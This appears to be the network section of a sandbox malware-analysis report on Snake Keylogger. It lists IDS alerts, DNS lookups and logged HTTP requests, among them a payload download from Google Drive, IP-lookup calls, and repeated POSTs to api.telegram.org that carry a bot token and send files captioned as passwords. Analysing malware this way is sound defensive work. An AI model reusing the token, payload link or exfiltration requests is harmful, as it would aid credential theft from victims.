            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50014 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50036 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50036 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50010 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50010 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50044 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50044 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50030 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50030 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50048 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49983 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49983 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50006 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50006 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50038 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50038 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50034 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50034 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:49987 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49987 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.9:50028 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:50028 -> 149.154.167.220:443
            Uses the Telegram API (likely for C&C communication)
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3199e441f6dbHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31b0368823d7Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31c24cf1dd08Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31d456c3dc56Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31e7b6fffa58Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31f9a7e3cc8bHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd320b8d01f7eaHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3220243286cdHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32334eab1922Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3247c90beef3Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd325ad854f9caHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3275fbf52428Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3288eb61d7c5Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd329a73bbadd4Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32aea0643760Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32cc1b350f07Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32e17780006aHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32f2c5d2fb99Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33055b4f13ffHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3317e34e673aHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd332a5d9f9c69Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd333ccb7fd9d3Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3351cb172d67Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd336809ef4d50Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd337ceb19b4f4Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3395a3db7cbeHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33abb28677f1Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33c5920c0b5cHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33df5e6a49aaHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33fe3ac1ecdfHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd341f90415beaHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd343e3f0cbb2fHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd34647c437859Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd348d28405116Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd34b0a4c9392cHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd319a08d3505fHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
            Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
            Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49980 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49978 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49975 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49972 -> 216.58.206.46:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1trnBctnI46zfY2OH8xW6LJoMTwL63BYh HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1trnBctnI46zfY2OH8xW6LJoMTwL63BYh&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49976 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1trnBctnI46zfY2OH8xW6LJoMTwL63BYh HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1trnBctnI46zfY2OH8xW6LJoMTwL63BYh&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
